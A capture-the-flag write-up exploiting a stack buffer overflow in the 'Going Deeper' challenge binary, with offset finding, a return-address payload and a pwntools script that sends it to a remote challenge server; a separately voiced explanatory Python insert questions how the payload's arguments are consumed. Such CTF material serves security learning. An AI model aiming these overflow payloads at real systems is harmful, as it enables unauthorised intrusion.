Space Pirate : Going Deeper
Solved by: Taz34
Here we have a 64-bit binary which takes input as follows:
After playing around with the binary I came across a segmentation fault, which tells us there is a buffer overflow here to exploit.
Using a pattern of increasing length, I found the offset to the saved return address to be 50.
Now, to understand how the binary works, I opened it in Cutter (https://cutter.re/).
Here we came across the main function and another interesting function named admin_panel. In admin_panel we came across an if statement:
From here we can understand that, if we want to reach the code that prints the flag, we need to make the if condition false.
So now we can create the payload. Its layout is:

    payload = b'A'*offset + ret_addr_main + ret_addr_admin_panel + if_arg1 + if_arg2 + if_arg3

With the values for this binary filled in:

    payload = b'A'*50 + p64(0x400b9a) + p64(0x400b46) + p64(0xdeadbeef) + p64(0x1337c0de) + p64(0x1337beef)
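The offset-finding and payload-building steps above, as an added worked example: this is my own code, not the author's script and not pwntools, and it re-implements the idea behind pwntools' cyclic()/cyclic_find() in plain Python so it runs offline. The crashing function is a constructed stand-in that places the saved return address 50 bytes past the buffer, as the write-up reports; SAVED_RIP_OFFSET, simulate_crash, find_offset and build_payload are names I introduce here. One caveat worth keeping in mind when reading the payload: under the System V AMD64 calling convention the first three integer arguments of a function are passed in rdi, rsi and rdx, not on the stack, so values appended after a return address are only consumed if the code you return to pops them or reads them as stack slots.

```python
# Added example (not the write-up author's code and not pwntools itself):
# how a cyclic pattern pins down an overflow offset, and how the fake
# stack frame from the write-up is assembled from that offset.
import itertools
import string
import struct

ALPHABET = string.ascii_lowercase
SUBSEQ_LEN = 4          # pwntools default: every 4-byte window of the pattern is unique


def de_bruijn(alphabet=ALPHABET, n=SUBSEQ_LEN):
    """Yield the de Bruijn sequence B(k, n) character by character."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for idx in a[1:p + 1]:
                    yield alphabet[idx]
        else:
            a[t] = a[t - 1]
            yield from db(t + 1, p)
            for j in range(a[t - 1] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length):
    """First `length` bytes of the pattern: b'aaaabaaacaaad...'."""
    return "".join(itertools.islice(de_bruijn(), length)).encode()


def cyclic_find(value, max_length=0x10000):
    """Offset at which `value` was taken from the pattern, or -1.

    `value` is the bytes that landed in the overwritten slot, or the integer
    read from a register/core dump (packed little-endian).  Only the low
    SUBSEQ_LEN bytes are needed because each such window is unique.
    """
    if isinstance(value, int):
        value = struct.pack("<Q", value)
    return cyclic(max_length).find(value[:SUBSEQ_LEN])


# --- constructed stand-in for the crashing binary -------------------------
SAVED_RIP_OFFSET = 50   # the offset the write-up reports for this binary


def simulate_crash(payload):
    """Model of the vulnerable function: an unbounded copy into a frame whose
    saved return address sits SAVED_RIP_OFFSET bytes past the buffer.
    Returns the 8 bytes that now occupy the saved RIP slot, which is what
    you would read at $rsp in gdb (or from the core file) after `ret` faults.
    """
    frame = bytearray(SAVED_RIP_OFFSET + 8)
    n = min(len(payload), len(frame))
    frame[:n] = payload[:n]
    return bytes(frame[SAVED_RIP_OFFSET:SAVED_RIP_OFFSET + 8])


def find_offset(pattern_len=200):
    """Send a pattern, take the value that overwrote the return address,
    and map it back to its position in the pattern."""
    crashed_with = simulate_crash(cyclic(pattern_len))
    return cyclic_find(crashed_with)


# --- payload construction --------------------------------------------------
def build_payload(offset, *words):
    """Padding up to the saved return address, then 64-bit little-endian
    words laid out in the order successive `ret`s will consume them."""
    return b"A" * offset + b"".join(struct.pack("<Q", w) for w in words)


def going_deeper_payload():
    # same values as the write-up's payload line
    return build_payload(SAVED_RIP_OFFSET,
                         0x400b9a,        # ret_addr_main
                         0x400b46,        # ret_addr_admin_panel
                         0xdeadbeef, 0x1337c0de, 0x1337beef)  # if_arg1..3


if __name__ == "__main__":
    print("offset:", find_offset())
    print("payload:", going_deeper_payload().hex())
```

Against the real binary you would replace simulate_crash() with the value gdb shows at $rsp after the crash (or, in pwntools, p.corefile.read(p.corefile.rsp, 8) after sending cyclic(200)); cyclic_find() then returns 50, and build_payload() is the struct.pack equivalent of the p64() chain in the final script.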
Now we have our payload set, so here is the final script:

    from pwn import *

    # local testing:
    #elf = ELF('./sp_going_deeper')
    #p = elf.process()
    p = remote("22.214.171.124", 31239)

    # 50 bytes of padding up to the saved return address, then the return
    # addresses and the three values for the admin_panel check
    payload = b'A'*50 + p64(0x400b9a) + p64(0x400b46) + p64(0xdeadbeef) + p64(0x1337c0de) + p64(0x1337beef)

    p.sendline(b'1')      # answer the first prompt with 1 (pwntools expects bytes)
    p.sendline(payload)
    p.interactive()
And here the flag is dumped.